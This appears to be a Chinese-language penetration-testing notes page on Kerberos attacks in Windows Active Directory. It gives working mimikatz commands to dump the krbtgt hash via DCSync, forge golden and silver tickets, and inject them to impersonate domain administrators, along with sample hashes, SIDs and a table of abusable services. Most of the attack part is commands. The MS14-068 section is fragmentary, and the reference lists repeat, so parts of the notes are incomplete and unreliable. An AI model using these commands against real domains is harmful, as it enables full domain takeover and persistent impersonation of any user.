黄金票据 白银票据 ms14068

黄金票据

黄金票据的条件要求：
1.域名称[AD PowerShell模块：（Get-ADDomain）.DNSRoot] 
2.域的SID 值[AD PowerShell模块：（Get-ADDomain）.DomainSID.Value] 
3.域的KRBTGT账户NTLM密码哈希
4.伪造用户名

一旦攻击者拥有管理员访问域控制器的权限，就可以使用Mimikatz来提取KRBTGT帐户密码哈希值。

1.导出krbtgt的Hash

在域控上执行通过mimkatz输出：

mimikatz log "lsadump::dcsync /domain:test.local /user:krbtgt"

生成票据 这里可以用aes256 aes128等等

kerberos::golden /admin:Administrator /domain:CTU.DOMAIN /sid:S-1-1-12-123456789-1234567890-123456789 /krbtgt:deadbeefboobbabe003133700009999 /ticket:Administrator.kiribi

导入票据

 kerberos::ptt ppc.kiribi

klist
klist  purge  删除所有票据

 mimikatz # kerberos::purge //清空当前凭证 mimikatz # kerberos::list //查看当前机器凭证 mimikatz # kerberos::ptc 票据文件 //将上一步生成的票据注入到内存中

 第二种黄金票据

Hash NTLM: b93dba67240e8236cf1ab028034779e2 
aes256_hmac:5c54f6b6d3d4ac4958cf5e04969e60700b69d2285c65ee4e2810e808f4febacc
krbtgt


net group "domain admins" /domain


查看域的SID号
whoami /all
kerberos::purge #清空票据 kerberos::golden /admin:administrator /domain:pp.zhong.czf /sid:S-1-5-21-2461438818-3229013638-4126918765 /krbtgt:b93dba67240e8236cf1ab028034779e2 /ticket:ticket.kirbi kerberos::ptt ticket.kirbi kerberos::tgt（此条命令好像并没有用）

 白银票据

kerberos::golden /admin:zhangsanfeng /domain:qianxiao996.com /id:1108 /sid:S-1-5-21-2461438818-3229013638-4126918765-1108 /target:QIANXIAO996-DM.school.com /rc4:b1e99870ac1230e33233fb54f240f171 /service:LDAP /ptt

lsadump::dcsync /dc:QIANXIAO996-DM.qianxiao996.com /domain:qianxiao996.com /user:krbtgt

 总结

 白银票据不与KDC交互，伪造Ticket直接与server进行交互。我们来看一下windows认证的第六步，server接收到客户端的数据包后，使用自己的密码hash解密ticket得出session key，在使用session key解密Authenticator和timestamp即通过验证，所以我们只需要知道server用户的hash就可以伪造出一个ticket，这就是白银票据。
首先，我们访问一个目标机器的C$文件夹

我们来伪造白银票据，获取目标server用户名

获取NTLM Hash

创建票据命令为：

kerberos::golden /domain:<域名> /sid:<域 SID> /target:<目标服务器主机名> /service:<服务类型> /rc4:<NTLM Hash> /user:<用户名> /ptt

白银票据根据用户hash生成，而且只能根据某些服务创建，可利用的服务如下
服务注释	服务名
WMI	HOST、RPCSS
Powershell Remoteing	HOST、HTTP
WinRM	HOST、HTTP
Scheduled Tasks	HOST
LDAP 、DCSync	LDAP
Windows File Share (CIFS)	CIFS
Windows Remote ServerAdministration Tools	RPCSS、LDAP、CIFS

生成票据

这时候再访问c$，不需要输入密码

0x04 黄金票据分析及利用

第二步中我们收到了AS发送的TGT，由于TGT是使用krbtgt密码hash加密，客户端无法解密，但是如果我们知道了krbtgt的hash，那么就可以直接生成任意用户的TGT，跳过了第一步的认证并可以访问相应的资源，这就是伪造黄金票据。

域控导出krbtgt NTLM Hash

生成黄金票据

kerberos::golden /user:Administrator /domain:domain-name /sid:user-sid/krbtgt:ntlmhash-value /ticket:golden.ti

在目录下生成了golden.ti票据文件，使用票据

kerberos::ptt golden.ti

这时候生成了一个域管理用户票据，尝试访问其他用户资源，成功，无需验证

 MS14068

    -u 域账号+@+域名称，这里是ts1+@+yunying.lab
    -p 为当前用户的密码，即ts1的密码
    -s 为ts1的SID值，可以通过whoami /all来获参考户的SID值
    -d 为当前域的域控

 

清除缓存导入票据

 最后

清除票据后

https://www.cnblogs.com/backlion/p/8127868.html
https://blog.csdn.net/qq_36374896/article/details/84453994
https://payloads.online/archivers/2018-11-30/1

https://blog.csdn.net/wy_97/article/details/87649262

https://www.varonis.com/blog/kerberos-attack-silver-ticket/

https://adsecurity.org/?p=2011

https://blog.csdn.net/wy_97/article/details/87649262

https://www.varonis.com/blog/kerberos-attack-silver-ticket/

https://adsecurity.org/?p=2011
https://www.dazhuanlan.com/2019/08/26/5d6304010760d/

特别注意的是sid不是本地管理员的sid是域用户的sid 千万别弄错了 先net user查看域用户的sid 或者切到域用户登陆 whoami /all查看 方可 其他没什么

 参考文献

https://www.cnblogs.com/backlion/p/8127868.html
https://blog.csdn.net/qq_36374896/article/details/84453994
https://payloads.online/archivers/2018-11-30/1

https://blog.csdn.net/wy_97/article/details/87649262

https://www.varonis.com/blog/kerberos-attack-silver-ticket/

https://adsecurity.org/?p=2011

https://blog.csdn.net/wy_97/article/details/87649262

https://www.varonis.com/blog/kerberos-attack-silver-ticket/

https://adsecurity.org/?p=2011
https://www.dazhuanlan.com/2019/08/26/5d6304010760d/

1.导出krbtgt的Hash

在域控上执行通过mimkatz输出：

mimikatz log "lsadump::dcsync /domain:test.local /user:krbtgt"